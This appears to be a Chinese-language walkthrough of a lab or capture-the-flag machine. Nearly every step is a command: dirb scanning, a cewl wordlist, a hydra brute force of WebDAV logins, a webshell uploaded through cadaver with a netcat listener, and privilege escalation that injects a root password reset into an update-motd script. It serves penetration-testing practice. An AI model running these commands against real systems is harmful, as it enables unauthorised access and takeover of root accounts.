1. 扫描根目录后的存在的路径

    dirb http://192.168.*.*/

  2. 找到http://192.168.*.*/webdav

  3. 使用cewl爬取网站创建密码字典

    cewl ip -w 1.txt

  4. 使用hydra暴力破解webdav的用户名与密码

    hydra -L 1.txt -P 1.txt 192.168.*.* http-get /webdav

#hydra -L [字典1] -P [字典2] [ip] [协议] [具体路径]

  5. 使用cadaver连接webdav

    cadaver http://192.168.*.*/webdav

  6. 传入webshell.php获取控制权限

    put webshell.php

  7. 开启本地监听用于监听webshell.php

    nc -lvvp 192.168.*.* 4444

  8. 获取控制台

    python3 -c 'import pty; pty.spawn("/bin/bash");'

  9. 获取Brainfuck加密文件,进行解码,获得登陆密码

  10. 根据/home用户登陆系统

  11. 使用motd提权,修改/etc/update-motd.d/00-header文件

    cd /etc/update-motd.d
echo "echo 'root:admin'|sudo chpasswd">>00-header

  12. 重新登陆,su root